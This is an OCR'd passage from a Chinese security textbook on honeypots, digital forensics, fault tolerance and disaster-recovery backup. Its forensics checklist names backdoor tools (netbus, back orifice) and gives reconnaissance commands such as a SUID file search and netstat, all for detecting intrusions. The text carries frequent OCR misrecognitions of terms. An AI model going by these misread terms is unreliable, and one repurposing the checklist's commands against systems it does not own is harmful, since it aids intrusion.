本 语言 写成 的 一 种 蜜 钠 工 具 软 件 , 能 在 支持 C 语言 和 Perl 的 系统 CUNIX) 上 运行 。 它 能 
够 监听 HTTP、FTP、Telnet 等 常用 服务 器 所 使 用 的 端口 ,模拟 标准 服务 器 对 接收 到 的 请 
求 所 作出 的 响应 ,还 可 以 模拟 多 种 常见 的 系统 漏洞 。 不 足 之 处 是 ,模拟 不 太 逼 真 ,构建 过 
程 麻烦 。 

(3) Honeyd 

Honeyd( 可 以 从 http: //www. citi. umich. edu/u/provos/honeyd 网 站 下 载 ) 是 一 个 专 
用 的 蜜 饶 构 建 软件 ,可 以 虚拟 多 种 主机 ,配置 运行 不 同 的 服务 和 操作 系统 。 


2. 蜜 网 实现 工具 


(1) 数据 控制 : Jptable .snort_inline。 

(2) 数据 捕获 : Termlog、Sebek2、Snort、Comlog。 
(3) 数据 收集 : Obfugator。 

(4) 数据 分 析 : Privmsg、TASK 、WinInterrogate。 


5.5 计算 机 取证 


现在 ,信息 系统 的 攻击 和 对 抗 已 经 不 仅仅 是 技术 领域 和 管理 领域 的 问题 了 。 许 多 问题 
已 经 涉 讼 ,成 为 法 学 案件 。 随 着 数字 犯罪 案件 的 增多 ,数字 证 据 的 获取 已 经 成 为 信息 技术 和 
法 学 家 们 共同 关注 的 热点 。 
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早先 ,数字 证 据 也 称 为 计算 机 证 据 。 对 于 它 的 研究 最 早 是 从 应 急 响 应 的 角度 开始 的 , 目 
的 是 为 了 搜集 攻击 者 的 有 关 信 息 。 直 到 2001 年 人 们 才 转 移 到 从 司法 的 角度 来 看 待 它 ,关于 
它 的 研究 才 从 纯 技 术 领 域 转向 技术 与 法 学 的 结合 上 。 


5.5.1 数字 证 据 的 特点 

数字 证 据 就 是 在 计算 机 或 在 计算 机 系统 运行 过 程 中 产生 的 .以 其 记录 的 内 容 来 证 明 案 
件 事实 的 电磁 记录 。 与 其 他 证 据 相 比 , 它 有 如 下 一 些 特点 。 

1. 依附 性 和 多 样 性 

电磁 证 据 依附 在 不 同 介质 上 。 这 就 带 来 两 个 方面 的 特点 : 一 是 数字 证 据 不 会 像 传统 的 
证 据 那 样 可 以 独立 存在 ;二 是 不 同 的 介质 使 同样 的 信息 表现 出 不 同 的 形态 ,如 在 导体 中 是 以 


电流 或 电压 表现 的 数字 脉冲 ,在 显示 器 上 是 文字 或 图 形 ,在 磁盘 中 是 磁 核 的 排列 形式 ,在 光 
缆 中 是 光波 等 。 


2. 可 伪 性 和 弱 证 明 性 


数字 证 据 的 非 实 物性 使 得 其 窃取 、 修 改 甚至 销毁 都 比较 容易 。 例 如 ,黑客 在 入侵 之 后 ， 
可 以 对 现场 进行 一 些 灭 迹 、 制 造假 象 等 工作 ,给 证 据 的 认定 带 来 困难 ,直接 降低 了 证 明 力度 ， 
增加 了 跟踪 和 侦查 的 难度 。 

3. 数据 的 挥发 性 


计算 机 系统 中 所 处 理 的 数据 有 一 些 是 动态 的 。 这 些 动态 数据 对 于 抓 住 犯罪 的 蛛丝马迹 
非常 有 用 。 但 是 它们 却 有 一 定 的 时 间 效 应 , 即 有 些 数 据 会 因 失效 或 消失 而 挥发 。 在 收集 数 
字 证 据 时 必须 充分 考虑 数据 的 挥发 性 。 表 5. 4 描述 了 数字 证 据 数据 的 挥发 性 。 
表 5.4 数字 证 据 的 挥发 性 


数据 硬件 或 位 置 存活 时 间 
CPU 高 速 缓冲 器 ,管道 几 个 时 钟 周期 
系统 RAM 关机 前 
内 核 表 进程 中 关机 前 
固定 介质 Swap/tmp 直至 被 覆盖 或 被 抹 掉 
可 移动 介质 Cdrom.Floppy、 HDO 直至 被 落 盖 或 被 抹 掉 
打印 输出 被 复制 打印 输出 直至 被 毁坏 


5.5.2 数字 取证 的 基本 原则 


实施 数字 取证 应 当 遵循 如 下 原则 : 符合 程序 ,共同 监督 ,保护 隐私 ,影响 最 小 ,证 据 连 
续 , 原 汁 原 味 。 下 面 分 别 予 以 说 明 。 


1. 符合 程序 


取证 应 当 首 先 启 动 法 律 程序 ,要 在 法 律 规定 的 范围 内 展开 工作 ,否则 会 陷入 被 动 。 
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2. 共同 监督 
由 原告 委派 的 专家 进行 整个 的 检查 .取证 过 程 必须 受到 由 其 他 方 委派 的 专家 的 监督 。 
3. 保护 隐私 


在 取证 过 程 中 ,要 尊重 任何 关于 客户 代理 人 的 隐私 。 一 旦 获取 了 一 些 关于 公司 或 个 人 
的 隐私 , 绝 不 能 泄露 。 


4. 影响 最 小 


。 如 果 取 证 要 求 必须 运行 某 些 业务 程序 ,应 当 使 运行 时 间 尽 量 短 ; 
。 必须 保证 取证 不 给 系统 带 来 副作用 ,如 引进 病毒 等 。 


5. 证 据 连续 


必须 保证 证 据 的 连续 性 (chain of custody) , 即 在 将 证 据 提 交 法 庭 前 要 一 直 跟 踪 证 据 ,要 
向 法 庭 说 明 在 这 段 时 间 内 证 据 有 无 变化 。 此 外 ,要 向 法 庭 说 明 该 证 据 的 完全 性 。 


6. 原 汁 原味 


。 必须 保证 提取 出 来 的 证 据 不 受 电 磁 或 机 械 的 损害 ; 
。 必须 保证 收集 的 证 据 不 被 取证 程序 破坏 。 


5.5.3 ”数字 取证 的 一 般 步骤 
数字 取证 过 程 一 般 可 以 按 如 下 步骤 进行 。 
1. 保护 现场 


。 在 取证 过 程 中 ,保护 目标 系统 ,避免 发 生 任何 改变 和 损害 ; 
。 保护 证 据 的 完整 性 ,防止 证 据 信息 的 丢失 和 破坏 ; 
。 防止 病毒 感染 。 


2. 证 据 发 现 


证 据 发 现 首先 要 识别 可 获取 证 据 的 信息 类 型 。 按 照 证 据 信 息 变化 的 特点 ,可 以 将 证 据 
言 息 分 为 两 大 类 : 

。 实 时 信息 (或 易 失 信息 ) ,例如 网 络 连 接 ; 

。 非 易 失 信息 , 即 不 会 随时 间或 设备 断 电 而 消失 。 

下 面 是 可 以 作为 证 据 或 可 以 提供 相关 信息 的 信息 源 。 

(1) 日 志 : 如 操作 系统 日 志 等 。 

(2) 文件 : 如 可 以 进行 的 文件 搜索 有 : 

。 搜索 目标 系统 中 的 所 有 文件 (包括 现存 的 正常 文件 .已 经 被 删除 但 仍 存在 于 磁盘 上 

还 没有 被 覆盖 的 文件 .隐藏 文件 、 受 密码 保护 的 和 加 密 文件 ); 
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。 尽量 恢复 所 发 现 的 文件 ; 

。 在 法 律 允 许 的 情况 下 ,访问 被 保护 或 加 密 的 文件 ; 

。 分 析 磁 盘 特 殊 区 域 (未 分 配 区 域 文件 栈 区 等 )。 

(3) 系统 进程 : 如 进程 名 、 进 程 访 问 文件 等 。 

(4) 用 户 : 特别 是 在 线 用 户 的 服务 时 间 、 使 用 方式 等 。 

(5) 系统 状态 : 如 系统 开放 的 服务 、 网 络 运 行 的 状态 等 。 

(6) 通信 连接 记录 : 如 网 络 路 由 器 的 运行 日 志 等 。 

(7) 存储 介质 : 如 磁盘 光盘、 闪存 等 。 

在 证 据 发 现 阶段 可 以 使 用 的 技术 有 : IDS、 密 饶 技 术 、 网 络 线索 自动 识别 技术 溯源 技术 
等 。 同 时 还 可 以 使 用 一 些 相 关 的 工具 。 表 5. 5 为 一 些 常用 的 实时 取证 类 工具 。 

表 5.5 一 些 常用 的 实时 取证 类 工具 


工具 名 称 用 途 描 述 


Netstat 显示 当前 受害 系统 的 网 络 监 听 程序 和 网 络 连 接 
ARP 查看 受害 系统 的 地 址 解析 缓存 表 

Who 显示 系统 在 线 用 户 信息 

last 显示 系统 登录 用 户 信息 

ps 查看 UNIX 系统 进程 信息 


3. 证 据 固定 


针对 数字 证 据 的 挥发 性 ,数字 证 据 的 固定 非常 重要 。 
4. 证 据 提取 
证 据 提取 主要 是 提取 特征 。 包 括 : 


。 过 滤 和 挖掘 ; 
。 解码: 对 软件 或 数据 碎片 进行 残缺 分 析 、 上 下 文 分 析 , 恢 复原 来 的 面貌 。 


5. 证 据 分 析 


分 析 的 目的 大 致 有 : 

。 犯罪 行为 重 构 ; 

。 嫌疑 人 画像 ; 

。 确定 犯罪 动机 ; 

。 受害 程度 行为 分 析 等 。 

6. 提交 证 据 

向 律师 ,管理 者 或 法 庭 提交 证 据 。 这 时 要 注意 使 用 规定 的 法 律 文书 格式 和 术语 。 
5.5.4 数字 取证 的 基本 技术 和 工具 


在 数字 取证 过 程 中 ,可 以 使 用 相关 的 技术 和 工具 。 现 在 已 经 开发 出 了 一 些 工 具 。 
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表 5. 6 为 可 以 提供 计算 机 及 网 络 攻击 取证 的 一 些 网 站 。 
表 5.6 提供 计算 机 及 网 络 攻 击 取证 的 一 些 网 站 


资源 类 型 网 络 地 址 
TCT 取证 软件 包 http://www. fish. com/forensics/ 
Encase http://www. encase. com/ 
计算 机 取证 分 析 http://www. porcupine. org/forensics/ 
Computer Forensics Tool Testing(CFTT) http://www. cftt. nist. gov/ 
文件 及 介质 取证 工具 箱 Sleuth Kit http://www. sleuthkit. org/sleuthkit/index. php 
开放 源 代码 数字 取证 http://www. opensourceforensics. org/ 


下 面 重点 介绍 利用 IDS 和 蜜 饶 取 证 的 方法 。 


1. 利用 IDS 取证 


把 IDS 与 取证 工具 结合 ,往往 能 对 网 络 攻击 进行 取证 并 得 到 响应 。 
(1) 确认 攻击 
确认 攻击 是 响应 的 第 一 步 。 确 认 攻 击 的 主要 方法 是 查找 攻击 留 下 的 痕迹 。 检 查 的 主要 
内 容 有 : 
。 寻找 嗅 探 器 (如 sniffer); 
。 寻找 远程 控制 程序 (如 netbus、back orifice); 
。 寻找 黑客 可 能 利用 的 文件 共享 或 通信 程序 (如 eggdrop \irc); 
。 寻找 特权 程序 (如 find/-perm-4000-print) 
。 寻找 未 授权 的 服务 (如 netstat-a、check inetd. conf) ; 
。 寻找 异常 文件 (考虑 系统 磁盘 的 大 小 ); 
。 检查 文件 系统 的 变动 ; 
。 检查 口令 文件 的 变动 并 寻找 新 用 户 ; 
。 检测 cron 和 at jobs; 
。 核对 系统 和 网 络 配 置 (特别 注意 过 滤 规 则 ); 
。 检查 所 有 主机 (特别 是 服务 器 ) 。 
(2) 取证 过 程 
J@ 决定 取证 的 目的 : 
。 观察 研究 攻击 者 
。 跟踪 并 驱赶 攻击 者 ; 
。 捕 俘 攻击 者 ; 
。 准备 起 诉 攻击 者 。 
@ 启动 必要 的 法 律 程序 。 
@ 对 系统 进行 完全 备份 ,包括 : 
。 用 tcpdump 作 完 全 的 分 组 日 志 ; 
。 有 关 协 议 分 组 的 来 龙 去 脉 ; 
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。 一 些 会 话 ( 如 Telnet\rlogin IRC、FTP 等 ) 的 可 能 内 容 。 
@ 根据 情况 有 选择 地 关闭 计算 机 系统 : 

。 不 彻底 关闭 系统 (否则 会 造成 信息 改变 ,证 据 被 破坏 ); 
。 不 断 开 网 络 ; 

。 将 系统 备份 转移 到 单 用 户 模式 下 制作 和 验证 备份 ; 

。 考虑 制作 磁盘 镜像 ; 

。 同步 磁盘 ,暂停 系统 。 

@ 调查 攻击 者 来 源 : 

。 利用 tcpdump/who/syslog。 

。 运行 finger 对 抗 远程 系统 。 

。 寻找 攻击 者 可 能 利用 的 账号 。 


2. 利用 蜜 钠 取 证 


利用 蜜 缸 进行 取证 分 析 的 一 些 原 则 和 步骤 如 下 。 

(1) 获取 入 侵 者 信息 。 

(2) 获取 关于 攻击 的 信息 : 

。 攻击 的 手段 .日 期 和 时 间 ; 

。 人 侵 者 添加 了 一 些 什么 文件 ? 

。 是 否 安装 了 嗅 探 器 或 密码 ? 若 有 ,在 何 处 ? 

。 是 否 安装 有 rootkit 或 木马 程序 ? 若 有 ,传播 途径 是 什么 ? 等 等 。 
(3) 建立 事件 的 时 间 序列 。 

(4) 事故 费用 分 析 。 

(5) 向 管理 层 .媒体 以 及 法 庭 提 交 相 应 的 报告 。 


5.5.5 数字 证 据 的 法 律 问 题 


数字 证 据 学 是 涉及 信息 技术 和 法 学 两 个 领域 的 交叉 学 科 。 下 面 讨论 它 在 法 学 方面 的 一 
些 问 题 。 


1. 数字 证 据 的 真实 性 


法 律 对 作为 定案 依据 的 证 据 , 有 真实 性 、 合 法 性 和 关联 性 三 方面 要 求 。 

一 般 而 言 , 关 联 性 主要 指证 据 与 案件 争议 和 理由 的 联系 程度 ,这 属于 法 官 裁判 的 范围 。 
合法 性 主要 包括 : 证 据 的 形式 ,收集 手段 .是 否 侵犯 他 人 权益 .取证 工具 是 否 合法 等 。 这 在 
后 面 要 进行 有 关 的 讨论 。 

关于 证 据 的 真实 性 ,民事 诉讼 法 和 相关 司法 解释 都 要 求 提 供 “ 原 件 ”( 书 面 文件 )。 因 为 
这 种 看 得 见 、 摸 得 着 的 东西 才能 给 人 充分 的 真实 感 和 唯一 性 ,才能 防止 被 算 改 和 冒 认 。 而 数 
字 证 据 的 真实 性 的 确认 一 直 是 人 们 最 关注 的 问题 。 目 前 ,人 们 想 用 数字 签名 的 方法 来 解决 
这 一 法 律 难题 。 通 过 电子 签名 可 以 证 明 签发 数字 证 据 的 人 是 谁 ,也 可 以 证 明 数字 证 据 是 否 
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2. 数字 证 据 的 证 明 力 


证 据 的 证 明 力 是 指证 据 对 证 明 案件 事实 所 具有 的 效力 , 即 该 证 据 是 否 能 够 直接 证 明 案 
件 事实 还 需要 其 他 证 据 配 合 综合 认定 。 我 国 (民事 诉讼 法 ) 第 63 条 规定 ,法 定 证 据 有 : 书 
证 ,物证 ,视听 资料 ,证 人 证 言 、 当 事 人 陈述 、 鉴 定 结论 和 勘 验 笔录 7 种 。 而 数字 证 据 应 当归 
入 这 ?7 类 之 中 ,还 是 另行 规定 ,这 是 司法 界 正 在 讨论 的 问题 。 


3. 数字 取证 工具 的 法 律 效力 


数字 证 据 的 合法 性 涉及 数字 取证 工具 的 法 律 效力 , 即 法 庭 是 否认 可 。 每 种 工具 都 是 一 
个 程序 。 按 照 Daubert 测试 ,可 以 从 下 面 4 个 方面 进行 讨论 。 

(1) 可 测试 性 

测试 的 目的 是 为 了 确定 一 个 程序 是 否 可 以 被 测试 并 确定 它 所 提供 的 结果 的 准确 性 。 对 
一 个 工具 必须 执行 两 类 测试 : 

。 漏 判 测 试 : 确认 取证 工具 是 否 可 以 在 输入 输出 端 提取 所 有 可 以 得 到 的 数据 。 

。 误 判 测试 : 确认 取证 工具 在 输入 输出 端 没 有 引入 新 的 数据 。 

(2) 错误 率 

测试 用 于 识别 在 数字 取证 工具 中 是 否 存在 已 知 的 错误 。 在 数字 取证 工具 中 可 能 存在 两 
类 错误 : 

。 工具 执行 错误 : 源 于 代码 中 漏洞 的 错误 。 

。 提取 错误 : 源 自 算法 的 错误 。 

(3) 公开 性 

公开 性 指 工具 在 公开 的 地 方 有 证 明 并 经 过 对 等 部 门 的 复查 。 这 是 证 据 得 以 承认 的 主要 
条 件 。 

(4) 可 接受 性 

工具 能 否 被 广泛 接受 。 


5.6 数据 容错 ,数据 容 灾 和 数据 备份 


信息 系统 是 脆弱 的 , 它 的 可 靠 性 不 断 遭 受 威胁 。 为 了 保证 系统 的 可 靠 性 ,经 过 长 期 摸 
索 , 人 们 总 结 出 了 3 条 途径 : 避 错 、 纠 错 和 容错 。 避 错 是 完善 设计 和 制造 .试图 构造 一 个 不 
会 发 生 故 障 的 系统 。 但 是 ,这 是 不 太 现实 的 。 任 何 一 个 系统 总 会 有 丝 漏 。 因 此 ,人 们 不 得 不 
用 纠 错 作为 避 错 的 补充 。 一 旦 系统 出 现 故障 ,可 以 通过 检测 和 核实 来 消除 ,再 进行 系统 的 
恢复 。 

容错 是 第 三 条 途径 。 其 基本 思想 是 ,灾害 对 系统 的 危害 要 比 错误 大 且 严 重 , 即 使 出 现 错 
误 , 系 统 也 能 执行 一 组 规定 的 程序 。 或 者 说 ,程序 不 会 因为 系统 中 的 故障 而 中 断 或 被 修改 ， 
并 且 故 障 也 不 引起 执行 结果 的 差错 。 或 者 简单 地 说 ,容错 是 系统 可 以 抵抗 错误 的 能 力 。 

容 灾 是 针对 灾害 而 言 的。 从 保护 数据 的 安全 性 出 发 ,数据 备份 是 数据 容错 、 数 据 容 灾 以 
及 数据 恢复 的 重要 保障 。 
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5.6.1 数据 容错 


1. 数据 容错 系统 分 类 


根据 容错 系统 的 应 用 环境 可 以 将 容错 系统 分 为 如 下 5 种 类 型 。 

(1) 高 可 用 度 系 统 

可 用 度 用 系统 在 某 时 刻 可 以 运行 的 概率 来 衡量 。 高 可 用 度 系统 面向 通用 计算 机 系统 ， 
用 于 执行 各 种 无 法 预测 的 用 户 程 序 , 主 要 面向 商业 市 场 。 

(2) 长 寿命 系统 

长 寿命 系统 在 其 生命 期 中 不 能 进行 人 工 维修 ,常用 于 航天 系统 中 。 它 实际 上 也 是 一 种 
容 灾 系 统 。 

(3) 延迟 维修 系统 

这 也 是 一 种 容 灾 系 统 , 用 于 航空 等 在 一 定 阶段 不 能 进行 维修 的 场 

(4) 高 性 能 系统 

这 类 系统 对 于 故障 (瞬时 或 永久 ) 都 非常 敏感 ,应 当 具 有 瞬时 故障 的 自动 恢复 能 力 , 并 增 
加 平均 无 故障 时 间 。 

(5) 关键 任务 系统 

这 类 系统 出 错 可 能 危机 人 的 生命 或 造成 重大 经 济 损 失 ,要求 处 理 正确 无 误 ,而 且 故 障 恢 
复 时 间 要 最 短 。 


2. 常用 数据 容错 技术 


(1) “空闲 ” 设 备 
“空闲 ?设备 也 称 双 件 热 备 ,就 是 配置 两 套 相 同 的 部 件 。 在 正常 状态 下 ,一 个 运行 , 另 一 
个 空闲 。 当 正常 运行 的 部 件 出 现 故障 时 ,原来 空闲 的 一 台 立 即 替补 。 


wp 


(2) 镜像 

镜像 是 把 一 份 工 作 交 给 两 个 相同 的 部 件 同时 执行 。 这 样 在 一 个 部 件 出 现 故障 时 , 另 一 
个 部 件 继续 工作 。 

(3) 复 现 

复 现 也 称 延迟 镜像 。 复 现 与 镜像 同样 需要 两 个 系统 ,但 是 它 把 一 个 称 为 原 系统 ,一 个 称 


为 辅助 系统 ,辅助 系统 从 原 系统 中 接收 数据 。 与 原 系 统 中 的 数据 相 比 ,辅助 系统 的 数据 接收 
存在 一 定 延 迟 。 当 原 系统 出 现 故 障 时 ,辅助 系统 只 能 在 接近 故障 点 的 地 方 开 始 工 作 。 与 镜 
像 相 比 , 复 现 同一 时 间 只 需 管理 一 套 设备 。 

(4) 负载 均衡 

负载 均衡 就 是 将 一 个 任务 分 解 成 多 个 子 任务 ,分 配给 不 同 的 服务 器 执行 ,通过 减少 每 个 
部 件 的 工作 量 来 增加 系统 的 稳定 性 。 
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5.6.2 数据 容 灾 


1. 数据 容 灾 等 级 


从 技术 上 看 ,衡量 数据 容 灾 系统 有 两 个 主要 指标 : RPO(recovery point object) 和 RTO 
(recovery time object) ,其 中 RPO 代表 了 当 灾 难 发 生 时 允许 丢失 的 数据 量 ;而 RTO 则 代表 
了 系统 恢复 的 时 间 。 数 据 容 灾 按 照 能 力 的 高 低 可 分 为 多 个 层次 ,例如 国际 标准 SHARE 78 
定义 的 容 灾 系 统 有 7 个 层次 : 从 最 简单 的 仅 在 本 地 进行 磁带 备份 ,到 将 备份 的 磁带 存储 在 
异地 ,再 到 建立 应 用 系统 实时 切换 的 异地 备份 系统 ,恢复 时 间 也 可 以 从 几 天 到 小 时 级 到 分 钟 
级 、 秒 级 或 0 数据 丢失 等 。 

设计 一 个 容 灾 备 份 系统 ,需要 考虑 多 方面 的 因素 ,如 备份 /恢复 数据 量 大 小 、 应 用 数据 中 
心 和 备 援 数据 中 心 之 间 的 距离 和 数据 传输 方式 、 灾 难 发 生 时 所 要 求 的 恢复 速度 、 备 援 中 心 的 
管理 及 投入 资金 等 。 根 据 这 些 因素 和 不 同 的 应 用 场合 ,常见 的 容 灾 等 级 有 以 下 4 个。 

(1) 第 0 级 : 本 地 备份 .本 地 保存 的 冷 备份 

这 是 容 灾 恢 复 能 力 最 弱 的 一 级 , 它 只 在 本 地 进行 数据 备份 ,并且 被 备份 的 数据 磁带 只 在 
本 地 保存 ,没有 送 往 异 地 。 

(2) 第 1 级 : 本 地 备份 .异地 保存 的 冷 备 份 

在 本 地 将 关键 数据 备份 ,然后 送 到 异地 保存 ,如 交 由 银行 保管 。 灾 难 发 生 后 , 按 预 定数 
据 恢 复 程 序 . 恢 复 系统 和 数据 。 这 种 容 灾 方 案 可 以 采用 磁带 机 光盘 库 等 存储 设备 。 

(3) 第 2 级 : 热 备份 站 点 备份 

在 异地 建立 一 个 热 备份 点 ,通过 网 络 进行 数据 备份 。 也 就 是 通过 网 络 以 同步 或 异步 方 
式 , 把 主 站 点 的 数据 备份 到 备份 站 点 。 备 份 站 点 一 般 只 备份 数据 ,不 承担 业务 。 当 出 现 灾难 
时 ,备份 站 点 接替 主 站 点 的 业务 ,从 而 维护 业务 运行 的 连续 性 。 

这 种 异地 远程 数据 容 灾 方案 的 容 灾 地 点 通常 要 选择 在 距离 本 地 不 小 于 20km 的 范围 ， 
采用 与 本 地 磁盘 阵列 相同 的 配置 ,通过 光纤 以 双 宛 余 方 式 接 人 到 SAN 网 络 中 ,实现 本 地 关 
键 应 用 数据 的 实时 同步 复制 。 在 本 地 数据 及 整个 应 用 系统 出 现 灾 难 时 ,系统 至 少 在 异地 保 
存 一 份 可 用 的 关键 业务 的 镜像 数据 。 该 数据 是 本 地 生产 数据 的 完全 实时 备份 。 对 于 企业 网 
来 说 ,建立 的 数据 容 灾 系 统 由 主 数据 中 心 和 备份 数据 中 心 组 成 。 

(4) 第 3 级 : 活动 互 援 备份 

这 种 异地 容 灾 方案 与 前 面 介绍 的 热 备份 站 点 备份 方案 差不多 ,不 同 的 只 是 主 、 从 系统 不 
再 是 固定 的 ,而 是 互 为 对 方 的 备份 系统 。 这 两 个 数据 中 心 系统 分 别 在 相隔 较 远 的 地 方 建立 ， 
它们 都 处 于 工作 状态 ,并 进行 相互 数据 备份 。 当 某 个 数据 中 心 发 生 灾难 时 , 另 一 个 数据 中 心 
接替 其 工作 任务 。 通 常 在 这 两 个 系统 中 的 光纤 设备 连接 中 还 提供 宛 余 通 道 ,以 备 工 作 通道 
出 现 故障 时 及 时 接 蔡 工作 。 当 然 采 取 这 种 容 灾 方 式 的 主要 是 资金 实力 较为 雄厚 的 大 型 企业 
和 电信 级 企业 。 


2. 异地 容 灾 技术 


在 建立 容 灾 备 份 系统 时 会 涉及 多 种 技术 ,如 SAN 或 NAS 技术、 远程 镜像 技术 、 虚 拟 存 
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储 、 基 于 IP 的 SAN 的 互 连 技术 .快照 技术 等 。 

(1) 远程 镜像 技术 

远程 镜像 技术 是 在 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 时 用 到 。 镜 像 是 在 两 个 或 多 
个 磁盘 或 磁盘 子 系统 上 产生 同一 个 数据 的 镜像 视图 的 信息 存储 过 程 ,一 个 叫 主 镜像 系统 , 另 
一 个 叫 从 镜像 系统 。 按 主 \, 从 镜像 存储 系统 所 处 的 位 置 可 分 为 本 地 镜像 和 远程 镜像 。 

远程 镜像 又 叫 远程 复制 ,是 容 灾 备份 的 核心 技术 ,同时 也 是 保持 远程 数据 同步 和 实现 灾 
难 恢复 的 基础 。 远 程 镜 像 按 请 求 镜像 的 主机 是 否 需 要 远程 镜像 站 点 的 确认 信息 ,又 可 分 为 
同步 远程 镜像 和 异步 远程 镜像 。 

同步 远程 镜像 (同步 复制 技术 ) 是 指 通过 远程 镜像 软件 ,将 本 地 数据 以 完全 同步 的 方式 
复制 到 异地 ,每 一 本 地 的 1/O 事务 均 需 等 待 远程 复制 的 完成 确认 信息 , 方 耶 以 释放 。 同 步 
镜像 使 远程 备份 总 能 与 本 地 机 要 求 复制 的 内 容 相 匹配 。 当 主 站 点 出 现 故障 时 ,用 户 的 应 用 
程序 切换 到 备份 的 替代 站 点 后 ,被 镜像 的 远程 副本 可 以 保证 业务 继续 执行 而 没有 数据 的 丢 
失 。 但 它 存 在 往返 传播 造成 延 时 较 长 的 缺点 ,只 限于 在 相对 较 近 的 距离 上 应 用 。 

异步 远程 镜像 (异步 复制 技术 ) 保 证 在 更 新 远程 存储 视图 前 完成 向 本 地 存储 系统 的 基本 
I/O 操作 ,而 由 本 地 存储 系统 提供 给 请 求 镜像 主机 的 I/O 操作 完成 确认 信息 。 远 程 的 数据 
复制 是 以 后 台 同 步 的 方式 进行 的 ,这 使 本 地 系统 性 能 受到 的 影响 很 小 ,传输 距离 长 (可 达 
1000km 以 上 ) ,对 网 络 带 宽 要 求 小 。 但 是 ,许多 远程 的 从 属 存储 子 系统 的 写 没 有 得 到 确认 ， 
当 某 种 因素 造成 数据 传输 失败 ,可 能 出 现 数据 一 致 性 问题 。 为 了 解决 这 个 问题 ,目前 大 多 采 
用 延迟 复制 的 技术 , 即 在 确保 本 地 数据 完好 无 损 后 进行 远程 数据 更 新 。 

(2) 快照 技术 

远程 镜像 技术 往往 同 快照 技术 结合 起 来 实现 远程 备份 , 即 通过 镜像 把 数据 备份 到 远程 
存储 系统 中 ,再 用 快照 技术 把 远程 存储 系统 中 的 信息 备份 到 远程 的 磁带 库 .光盘 库 中 。 

快照 是 通过 软件 对 要 备份 的 磁盘 子 系统 的 数据 快速 扫描 ,建立 一 个 要 备份 数据 的 快照 
逻辑 单元 号 LUN 和 快照 cache, 在 快速 扫描 时 ,把 备份 过 程 中 即将 要 修改 的 数据 块 同时 快 
速 复制 到 快照 cache 中 。 快 照 LUN 是 一 组 指针 , 它 指向 快照 cache 和 磁盘 子 系统 中 不 变 的 
数据 块 (在 备份 过 程 中 )。 在 正常 业务 进行 的 同时 ,利用 快照 LUN 实现 对 原 数 据 的 一 个 完 
全 的 备份 。 它 可 使 用 户 在 正常 业务 不 受 影响 的 情况 下 ,实时 提取 当前 在 线 业务 数据 。 其 “ 备 
份 窗口 "接近 于 零 , 可 大 大 增加 系统 业务 的 连续 性 ,为 实现 系统 真正 的 7X24( 天 X 小 时 ) 运 
转 提 供 了 保证 。 

快照 是 通过 内 存 作为 缓冲 区 (快照 cache) ,由 快照 软件 提供 系统 磁盘 存储 的 即时 数据 映 
像 , 它 存在 缓冲 区 调度 的 问题 。 

(3) 互 连 技术 

早期 的 主 数据 中 心 和 备 援 数据 中 心 之 间 的 数据 备份 主要 是 基于 SAN 的 远程 复制 ( 镜 
像 ), 即 通过 光纤 通道 FC, 把 两 个 SAN 连接 起 来 ,进行 远程 镜像 (复制 )。 当 灾难 发 生 时 ,由 
备 援 数据 中 心 替 代 主 数据 中 心 ,以 保证 系统 工作 的 连续 性 。 这 种 远程 容 灾 备份 方式 存在 一 
些 缺 陷 , 如 实现 成 本 高 ,设备 的 互 操作 性 差 .跨越 的 地 理 距离 短 (10km) 等 ,这 些 因 素 阻碍 了 
它 的 进一步 推广 和 应 用 。 

目前 ,出 现 了 多 种 基于 IP 的 SAN 的 远程 数据 容 灾 备份 技术 。 它 们 是 利用 基于 IP 的 
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SAN 的 互 连 协议 ,将 主 数据 中 心 SAN 中 的 信息 通过 现 有 的 TCP/IP 网 络 ,远程 复制 到 备 援 
中 心 SAN 中 。 当 备 援 中 心 存储 的 数据 量 过 大 时 ,可 利用 快照 技术 将 其 备份 到 磁带 库 或 光 
盘 库 中 。 这 种 基于 IP 的 SAN 的 远程 容 灾 备份 可 以 跨越 LAN、MAN 和 WAN., 成 本 低 、 可 
扩展 性 好 ,具有 广阔 的 发 展 前 景 。 基 于 IP 的 互 连 协议 包括 FCIP、iFCP、 Infiniband、 
iSCSI 等 。 

(4) 虚拟 存储 

在 有 些 容 灾 方案 产品 中 还 采取 了 虚拟 存储 技术 ,如 西 瑞 异 地 容 灾 方 案 。 虚 拟 化 存储 技 
术 在 系统 弹性 和 可 扩展 性 上 开创 了 新 的 局 面 。 它 将 几 个 IDE 或 SCSI 驱动 器 等 不 同 的 存储 
设备 串联 为 一 个 存储 池 。 存 储 集群 的 整个 存储 容量 可 以 分 为 多 个 逻辑 卷 ,并 作为 虚拟 分 区 
进行 管理 。 存 储 由 此 成 为 一 种 功能 而 非 物理 属性 ,而 这 正 是 基于 服务 器 的 存储 结构 存在 的 
主要 限制 。 

虚拟 存储 系统 还 提供 了 动态 改变 逻辑 卷 大 小 的 功能 。 事实 上 ,存储 卷 的 容量 可 以 在 线 
随意 增加 或 减少 。 可 以 通过 在 系统 中 增加 或 减少 物理 磁盘 的 数量 来 改变 集群 中 人 逻辑 卷 的 大 
小 。 这 一 功能 允许 卷 的 容量 随 用 户 的 即时 要 求 动 态 改变 。 另 外 ,存储 卷 能 够 很 容易 地 改变 
容量 ,移动 和 替换 。 安 装 系统 时 ,只 需 为 每 个 逻辑 卷 分 配 最 小 的 容量 ,并 在 磁盘 上 留 出 剩余 
的 空间 。 随 着 业务 的 发 展 ,可 以 用 剩余 空间 根据 需要 扩展 逻辑 卷 。 也 可 以 将 数据 在 线 从 旧 
驱动 器 转移 到 新 的 驱动 器 上 ,而 不 中 断 服务 的 运行 。 

存储 虚拟 化 的 一 个 关键 优势 是 它 允 许 异 质 系 统 和 应 用 程序 共享 存储 设备 ,而 不 管 它们 
位 于 何 处 。 公 司 将 不 再 在 每 个 分 部 的 服务 器 上 都 连接 一 台 磁 带 设 备 。 


5.6.3 数据 备份 


真正 的 数据 容 灾 就 是 要 能 在 灾难 发 生 时 ,全面 ` 及 时 地 恢复 整个 系统 。 在 系统 遭受 灾害 
时 ,使 系统 还 能 工作 或 尽快 恢复 工作 的 最 基础 的 工作 是 数据 备份 。 不 论 任 何 一 个 容 灾 系统 ， 
对 于 没有 备份 的 数据 ,任何 容 灾 方案 都 没有 现实 意义 。 

数据 备份 是 数据 存储 的 安全 关键 性 保护 措施 。 病 毒 破坏 、 非 法 操作 、 黑 客 攻击 \ 误 操作 、 
